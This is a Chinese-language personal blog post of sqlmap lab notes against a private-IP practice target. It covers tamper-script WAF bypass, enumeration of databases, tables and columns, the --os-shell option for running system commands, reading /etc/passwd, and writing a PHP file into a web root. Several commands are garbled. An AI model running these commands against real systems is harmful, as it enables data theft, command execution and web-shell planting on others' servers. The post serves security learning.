<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>sqlmap的一些使用 | 北暮南辞</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="sqlmap tamper的使用  sqlmap是一款人见人爱的自动化SQL注入工具，能够以良好的引擎发现给定URL中的可注入处，并自动的完成注入。    但是由于SQL注入的影响过于广泛，致使现代程序的防护越来越严密。为了突破这些防护，我们可以使用tamper。sqImap&#x2F;tamper是官方给出的些绕过脚本，可以配合渗透测试人员完成更高效更高质量的测试。    当然我们也可以自己更有">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlmap的一些使用">
<meta property="og:url" content="http://example.com/2023/02/01/sqlmap%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="北暮南辞">
<meta property="og:description" content="sqlmap tamper的使用  sqlmap是一款人见人爱的自动化SQL注入工具，能够以良好的引擎发现给定URL中的可注入处，并自动的完成注入。    但是由于SQL注入的影响过于广泛，致使现代程序的防护越来越严密。为了突破这些防护，我们可以使用tamper。sqImap&#x2F;tamper是官方给出的些绕过脚本，可以配合渗透测试人员完成更高效更高质量的测试。    当然我们也可以自己更有">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/images/17.png">
<meta property="og:image" content="http://example.com/images/18.png">
<meta property="og:image" content="http://example.com/images/19.png">
<meta property="og:image" content="http://example.com/images/20.png">
<meta property="og:image" content="http://example.com/images/21.png">
<meta property="og:image" content="http://example.com/images/22.png">
<meta property="og:image" content="http://example.com/images/23.png">
<meta property="article:published_time" content="2023-02-01T07:17:56.000Z">
<meta property="article:modified_time" content="2023-02-01T07:39:24.572Z">
<meta property="article:author" content="殆尽">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/17.png">
  
    <link rel="alternate" href="/atom.xml" title="北暮南辞" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">北暮南辞</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">ctf小萌新一枚</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Suche"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Suche"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sqlmap的一些使用" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/02/01/sqlmap%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BD%BF%E7%94%A8/" class="article-date">
  <time class="dt-published" datetime="2023-02-01T07:17:56.000Z" itemprop="datePublished">2023-02-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      sqlmap的一些使用
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h2 id="sqlmap-tamper的使用"><a href="#sqlmap-tamper的使用" class="headerlink" title="sqlmap tamper的使用"></a>sqlmap tamper的使用</h2><p>  sqlmap是一款人见人爱的自动化SQL注入工具，能够以良好的引擎发现给定URL中的可注入处，并自动的完成注入。<br>    但是由于SQL注入的影响过于广泛，致使现代程序的防护越来越严密。为了突破这些防护，我们可以使用tamper。sqImap&#x2F;tamper是官方给出的些绕过脚本，可以配合渗透测试人员完成更高效更高质量的测试。<br>    当然我们也可以自己更有针对性的编写一些绕过脚本。</p>
<h3 id="一、输入命令"><a href="#一、输入命令" class="headerlink" title="一、输入命令"></a>一、输入命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python sqlmap.py -u 192.168.30.124:8203/base64.php? <span class="built_in">id</span>=MQ=—-tamper=base64encode</span><br></pre></td></tr></table></figure>
<p><img src="/images/17.png"></p>
<h3 id="二、获取数据库信息"><a href="#二、获取数据库信息" class="headerlink" title="二、获取数据库信息"></a>二、获取数据库信息</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python sqlmap. py -u 192.168.30.124:8203/base64.php?<span class="built_in">id</span>=MQ==—-tamper=base64encode --dbs</span><br></pre></td></tr></table></figure>
<p><img src="/images/18.png"></p>
<h3 id="三、获取数据表信息"><a href="#三、获取数据表信息" class="headerlink" title="三、获取数据表信息"></a>三、获取数据表信息</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap.py -u 192.168.30.124:8203/base64.php?<span class="built_in">id</span>=MQ== --tamper=base64encode-D security --tables</span><br></pre></td></tr></table></figure>
<p><img src="/images/19.png"></p>
<h3 id="四、获取字段信息"><a href="#四、获取字段信息" class="headerlink" title="四、获取字段信息"></a>四、获取字段信息</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap.py -u 192.168.30.124:8203/base64.php?<span class="built_in">id</span>=MQ== --tamper=base64encode -D security -Tusers</span><br></pre></td></tr></table></figure>
<p><img src="/images/20.png"></p>
<h3 id="五、获取数据"><a href="#五、获取数据" class="headerlink" title="五、获取数据"></a>五、获取数据</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap.py -u 192.168.30.124:8203/base64.php?<span class="built_in">id</span>=MQ==---tamper=base64encode -D security -T</span><br></pre></td></tr></table></figure>
<p><img src="/images/21.png"></p>
<h2 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h2><p>-D后面是数据库名称<br>-T后面是表的名称<br>-C来指明字段<br>–dump来获取数据</p>
<h2 id="sqlmap-–os-shell"><a href="#sqlmap-–os-shell" class="headerlink" title="sqlmap –os-shell"></a>sqlmap –os-shell</h2><p>sqlmap中的–os-shell命令是sqlmap提供的一个执行目标系统命令的交互式shell。<br>使用方法为:sqlmap.py -u URL –os-shell</p>
<h2 id="sqlmap读写文件"><a href="#sqlmap读写文件" class="headerlink" title="sqlmap读写文件"></a>sqlmap读写文件</h2><pre><code>sqlmap提供了可读写文件的参数，首先找需要知道网站的物理路径，其次需要有可写或可读的权限。
</code></pre>
<p>(1) –file-read&#x3D;RFILE<br>  从后端的数据库管理系统文件系统读取文件（物理路径)<br>(2) –file-write&#x3D;WFILE<br>  编辑后端的数据库管理系统文件系统上的本地文件(mssql xp_shell)<br>(3) –file-dest&#x3D;DFILE<br>  后端的数据库管理系统写入文件的绝对路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap.py -u http://192.168.30.124:8203/Less-1/?<span class="built_in">id</span>=1 --file-read /etc/passwd</span><br></pre></td></tr></table></figure>
<p><img src="/images/22.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap.py -u http://192.168.30.124:8203/Less-1/?<span class="built_in">id</span>=1 --file-dest /var/www/html/info.php</span><br></pre></td></tr></table></figure>
<p><img src="/images/23.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/02/01/sqlmap%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BD%BF%E7%94%A8/" data-id="cldv55z9f00090wu76v8s74yd" data-title="sqlmap的一些使用" class="article-share-link">Teilen</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/02/01/SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Neuer</strong>
      <div class="article-nav-title">
        
          SQL注入的常见绕过方式
        
      </div>
    </a>
  
  
    <a href="/2023/02/01/sqlmap%E5%AE%89%E8%A3%85/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Älter</strong>
      <div class="article-nav-title">sqlmap安装</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archiv</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/02/">February 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/01/">January 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">letzter Beitrag</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/02/08/%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%BC%8F%E6%B4%9E/">条件竞争漏洞</a>
          </li>
        
          <li>
            <a href="/2023/02/08/XML/">XML</a>
          </li>
        
          <li>
            <a href="/2023/02/07/pwn/">pwn</a>
          </li>
        
          <li>
            <a href="/2023/02/07/%E5%AD%97%E7%AC%A6%E8%BD%AC%E5%8C%96/">字符转换算法</a>
          </li>
        
          <li>
            <a href="/2023/02/07/%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95/">动态调试</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 殆尽<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>